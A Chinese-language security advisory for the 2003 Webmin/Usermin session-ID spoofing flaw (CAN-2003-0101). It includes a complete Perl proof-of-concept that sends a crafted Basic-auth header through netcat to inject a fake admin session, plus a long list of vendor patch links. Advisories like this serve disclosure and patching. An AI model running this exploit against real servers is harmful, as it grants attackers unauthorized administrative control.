Webmin/Usermin Session ID欺骗未授权可访问漏洞发布时间:2003-02-24 更新时间:2003-02-28 严重程度:高 威胁程度:控制应用程序系统 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:6915 CVE(CAN) ID:CAN-2003-0101 受影响系统 EnGarde Guardian Digital WebTool 1.2详细描述 Webmin/Usermin是基于WEB的UNIX管理程序,可以管理用户帐户等。 Webmin通过使用分配会话ID来验证用户,通过使用用户名中包含控制转义序列字符而伪造SID到会话ID库中,导致未授权访问应用程序。 如简单的建立用户'admin',SID为1234567890,包含如下的COOKIE信息: sid=1234567890; testing=1 这样COOKIE HTTP头包含: Cookie: sid=1234567890; testing=1 当webmin服务器接收到此COOKIE的时候,就可以通过验证,使攻击者控制WEBMIN服务器。 测试代码 #!/usr/bin/perl # # Exploit for Webmin 1.050 -> 1.060 by Carl Livitt # # Inserts a fake session_id into the sessions list of webmin. # Does no error checking... if remote host is not found, no # error will be reported. # print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n"; print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n"; $nc="/usr/bin/netcat"; if($#ARGV == -1) { print "Syntax:\n\t$0 hostname\n"; exit(1); } $hostname=$ARGV[0]; if ( ! -x $nc ) { print "netcat not found!\n"; exit(2); } open(NC, "|$nc $hostname 10000 >& /dev/null"); print NC "GET / HTTP/1.1\n"; print NC "Host: $hostname\n"; print NC "User-agent: webmin\n"; print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n"; close(NC); print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n"; print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will "; print "be authenticated to the webmin server!\n\n"; print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n"; 解决方案 升级程序: EnGarde Guardian Digital WebTool 1.2: Engarde Secure Linux Upgrade WebTool-1.2-1.0.74.noarch.rpm http://ftp.engardelinux.org/pub/engarde/stable/updates/noarch/WebTool-1.2-1.0.74.noarch.rpm Engarde Secure Linux Upgrade WebTool-userpass-1.2-1.0.74.noarch.rpm http://ftp.engardelinux.org/pub/engarde/stable/updates/noarch/WebTool-userpass-1.2-1.0.74.noarch.rpm Webmin Usermin 0.4: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.5: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.6: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.7: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.8: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.9: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.91: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.92: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.93: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.94: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.95: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.96: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.97: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html MandrakeSoft Upgrade webmin-0.970-2.1mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Single Network Firewall 7.2 MandrakeSoft Upgrade webmin-0.970-2.3mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2 MandrakeSoft Upgrade webmin-0.970-2.3mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1 MandrakeSoft Upgrade webmin-0.970-2.2mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0 MandrakeSoft Upgrade webmin-0.970-2.1mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Linux-Mandrake 7.2 MandrakeSoft Upgrade webmin-0.970-2.2mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0/PPC MandrakeSoft Upgrade webmin-0.970-2.3mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1/IA64 MandrakeSoft Upgrade webmin-0.970-2.3mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2/PPC Webmin Usermin 0.98: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html Webmin Usermin 0.99: Webmin Upgrade usermin-1.000.tar.gz http://www.webmin.com/udownload.html MandrakeSoft Upgrade webmin-0.990-6.1mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 9.0 Webmin Webmin 0.970: MandrakeSoft Upgrade webmin-0.970-2.1mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Single Network Firewall 7.2 MandrakeSoft Upgrade webmin-0.970-2.3mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2 MandrakeSoft Upgrade webmin-0.970-2.3mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1 MandrakeSoft Upgrade webmin-0.970-2.2mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0 MandrakeSoft Upgrade webmin-0.970-2.1mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Linux-Mandrake 7.2 MandrakeSoft Upgrade webmin-0.970-2.2mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0/PPC MandrakeSoft Upgrade webmin-0.970-2.3mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1/IA64 MandrakeSoft Upgrade webmin-0.970-2.3mdk.noarch.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2/PPC Webmin Webmin 0.990: Webmin Webmin 1.0 60: Webmin Upgrade webmin-1.070.tar.gz http://www.webmin.com/download.html Webmin Webmin 1.0 50: Webmin Upgrade webmin-1.070.tar.gz http://www.webmin.com/download.html 相关信息 Keigo Yamazaki and Cintia M. Imanishi. 参考:http://www.securityfocus.com/advisories/5010 http://www.securityfocus.com/advisories/5014 http://www.securityfocus.com/advisories/5024 http://www.securityfocus.com/advisories/5028 http://www.securityfocus |
